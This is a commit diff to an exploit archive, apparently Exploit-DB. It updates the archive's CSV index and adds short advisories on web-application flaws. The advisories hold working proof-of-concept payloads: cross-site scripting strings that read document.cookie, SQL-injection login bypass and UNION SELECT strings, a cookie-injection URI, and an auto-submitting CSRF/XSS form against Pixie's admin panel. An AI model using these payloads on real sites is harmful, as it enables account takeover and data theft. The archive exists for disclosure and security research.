Updated 08_17_2014

files.csv

@@ -1275,7 +1275,7 @@ id,file,description,date,author,platform,type,port
 1532,platforms/php/webapps/1532.pl,"PwsPHP <= 1.2.3 (index.php) Remote SQL Injection Exploit",2006-02-25,papipsycho,php,webapps,0
 1533,platforms/php/webapps/1533.php,"4Images <= 1.7.1 (Local Inclusion) Remote Code Execution Exploit",2006-02-26,rgod,php,webapps,0
 1534,platforms/sco/local/1534.c,"SCO Unixware 7.1.3 (ptrace) Local Privilege Escalation Exploit",2006-02-26,prdelka,sco,local,0
-1535,platforms/windows/dos/1535.c,"CrossFire <= 1.8.0 (oldsocketmode) Remote Buffer Overflow PoC",2006-02-27,"Luigi Auriemma",windows,dos,0
+1535,platforms/windows/dos/1535.c,"CrossFire <= 1.8.0 - (oldsocketmode) Remote Buffer Overflow PoC",2006-02-27,"Luigi Auriemma",windows,dos,0
 1536,platforms/windows/remote/1536.pm,"MS Internet Explorer 6.0 SP0 IsComponentInstalled() Remote Exploit",2006-02-28,"H D Moore",windows,remote,0
 1537,platforms/windows/remote/1537.pm,"Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow",2006-02-28,y0,windows,remote,44334
 1538,platforms/php/webapps/1538.pl,"farsinews <= 2.5 - Directory Traversal arbitrary (users.db) access exploit",2006-02-28,Hessam-x,php,webapps,0
@@ -1320,7 +1320,7 @@ id,file,description,date,author,platform,type,port
 1578,platforms/linux/remote/1578.c,"PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit (2)",2006-03-12,darkeagle,linux,remote,7144
 1579,platforms/linux/local/1579.pl,"Ubuntu Breezy 5.10 Installer Password Disclosure Vulnerability",2006-03-12,"Kristian Hermansen",linux,local,0
 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog <= 0.4.7.1 - Remote Command Execution Exploit",2006-03-13,rgod,php,webapps,0
-1582,platforms/linux/remote/1582.c,"crossfire-server <= 1.9.0 SetUp() Remote Buffer Overflow Exploit",2006-03-13,landser,linux,remote,13327
+1582,platforms/linux/remote/1582.c,"crossfire-server <= 1.9.0 - SetUp() Remote Buffer Overflow Exploit",2006-03-13,landser,linux,remote,13327
 1583,platforms/osx/remote/1583.pl,"Apple Mac OS X 10.4.5 Mail.app (Real Name) Buffer Overflow Exploit",2006-03-13,"Kevin Finisterre",osx,remote,25
 1584,platforms/windows/local/1584.cpp,"MS Windows Telephony Service Command Execution Exploit (MS05-040)",2006-03-14,"Cesar Cerrudo",windows,local,0
 1585,platforms/php/webapps/1585.php,"php iCalendar <= 2.21 (Cookie) Remote Code Execution Exploit",2006-03-15,rgod,php,webapps,0
@@ -30924,3 +30924,12 @@ id,file,description,date,author,platform,type,port
 34334,platforms/win64/remote/34334.rb,"VirtualBox 3D Acceleration Virtual Machine Escape",2014-08-14,metasploit,win64,remote,0
 34335,platforms/linux/remote/34335.rb,"VMTurbo Operations Manager 4.6 vmtadmin.cgi Remote Command Execution",2014-08-14,metasploit,linux,remote,80
 34336,platforms/php/webapps/34336.html,"Disqus for Wordpress 2.7.5 Admin Stored CSRF and XSS",2014-08-14,"Nik Cubrilovic",php,webapps,80
+34337,platforms/php/webapps/34337.txt,"Gekko Web Builder 9.0 'index.php' Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
+34338,platforms/php/webapps/34338.html,"Pixie 1.0.4 HTML Injection and Cross-Site Scripting Vulnerabilities",2010-07-15,"High-Tech Bridge SA",php,webapps,0
+34339,platforms/php/webapps/34339.txt,"Pligg 1.0.4 'search.php' Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
+34340,platforms/multiple/dos/34340.txt,"Unreal Engine - 'ReceivedRawBunch()' Denial Of Service Vulnerability",2010-07-15,"Luigi Auriemma",multiple,dos,0
+34341,platforms/php/webapps/34341.txt,"WX-Guestbook 1.1.208 SQL Injection and HTML Injection Vulnerabilities",2009-09-21,learn3r,php,webapps,0
+34342,platforms/php/webapps/34342.txt,"Ez Poll Hoster Multiple Cross Site Scripting Vulnerabilities",2009-12-14,"Milos Zivanovic ",php,webapps,0
+34343,platforms/asp/webapps/34343.txt,"MOJO IWMS 7 'default.asp' Cookie Manipulation Vulnerability",2007-12-17,"cp77fk4r ",asp,webapps,0
+34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET Multiple SQL Injection Vulnerabilities",2009-12-17,bi0,asp,webapps,0
+34345,platforms/java/webapps/34345.txt,"jCore 'search' Parameter Cross Site Scripting Vulnerability",2009-12-17,loneferret,java,webapps,0

platforms/asp/webapps/34343.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/41746/info
+
+MOJO IWMS is prone to a cookie-manipulation vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this vulnerability could allow an attacker to masquerade as another user. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+MOJO IWMS 7 is vulnerable; other versions may also be affected. 
+
+The following example URI is available:
+
+http://www.example.com/upload/default.asp?mode=wrong&ERRMSG=%3Cmeta+http-equiv='Set-cookie'+content='[Cookie-Name]=[Cookie-Value]'%3E 

platforms/asp/webapps/34344.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/41747/info
+
+Pre Jobo.NET is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+The following example data is available:
+
+User : 1'or'1'='1
+Pass : 1'or'1'='1 

platforms/java/webapps/34345.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41748/info
+
+jCore is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/modules/search?search=</a><input value="xss" onclick="alert(1)" type="submit">

platforms/multiple/dos/34340.txt

@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/41737/info
+
+Unreal Engine is prone to a denial-of-service vulnerability.
+
+An attacker can exploit this issue to crash the affected server, resulting in denial-of-service conditions.
+
+The following games which are developed with Unreal Engine are affected:
+
+Rainbow Six: Raven Shield
+Deus Ex
+Land of the Dead
+Postal 2
+Rune
+Shadow Ops
+Unreal 2
+Unreal Tournament
+Unreal Tournament 2003
+WarPath
+XIII
+Other games may also be affected. 
+
+http://www.exploit-db.com/sploits/34340.zip

platforms/php/webapps/34337.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41726/info
+
+Gekko Web Builder is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Gekko Web Builder 0.90 ALPHA is vulnerable; prior versions may be affected.
+
+http://www.example.com/admin/index.php?app=settings"><script>alert(document.cookie)</script>

platforms/php/webapps/34338.html

@@ -0,0 +1,36 @@
+source: http://www.securityfocus.com/bid/41727/info
+
+Pixie is prone to an HTML-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks.
+
+Pixie 1.0.4 is vulnerable; other versions may also be affected.
+
+<form accept-charset="UTF-8" action="http://www.example.com/admin/index.php?s=settings&x=pixie" method="post" name="main" >
+<input type="hidden" name="langu" value="en-gb" />
+<input type="hidden" name="time_zone" value="+0" />
+<input type="hidden" name="dstime" value="no" />
+<input type="hidden" name="dateformat" value="%Oe %B %Y, %H:%M" />
+<input type="hidden" name="rte" value="1" />
+<input type="hidden" name="logs" value="5" />
+<input type="hidden" name="sysmess" value=&#039;hello message"><script>alert(document.cookie)</script>&#039; />
+<input type="submit" name="settings_edit" id="form_addedit_submit" value="Update" />
+</form>
+<script>
+document.getElementById(&#039;form_addedit_submit&#039;).click();
+</script>
+        
+<form accept-charset="UTF-8" action="http://www.example.com/admin/index.php?s=settings&x=site" method="post" name="main" >
+<input type="hidden" name="sitename" value="Pixie" />
+<input type="hidden" name="url" value="http://host/" />
+<input type="hidden" name="default" value="blog/" />
+<input type="hidden" name="keywords" value=&#039;key1"><script>alert(document.cookie)</script>&#039; />
+<input type="hidden" name="site_auth" value="sute author" />
+<input type="hidden" name="site_cright" value="copyright" />
+<input type="hidden" name="cleanurls" value="yes" />
+<input type="submit" name="settings_edit" id="form_addedit_submit" value="Update" />
+</form>
+<script>
+document.getElementById(&#039;form_addedit_submit&#039;).click();
+</script>
+        

platforms/php/webapps/34339.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41729/info
+
+Pligg is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Pligg 1.0.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/search/1"><script>alert(document.cookie)</script>

platforms/php/webapps/34341.txt

@@ -0,0 +1,9 @@
+source:  http://www.securityfocus.com/bid/41741/info
+
+WX-Guestbook is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
+
+WX-Guestbook version 1.1.208 is affected; other versions may also be affected.
+
+test%') UNION ALL SELECT 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/* 

platforms/php/webapps/34342.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/41742/info
+
+Ez Poll Hoster is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+The following example URIs are available:
+
+http://www.example.com/eph/index.php?action=code&pid=[XSS]
+
+http://www.example.com/eph/profile.php?action=view&uid=[XSS]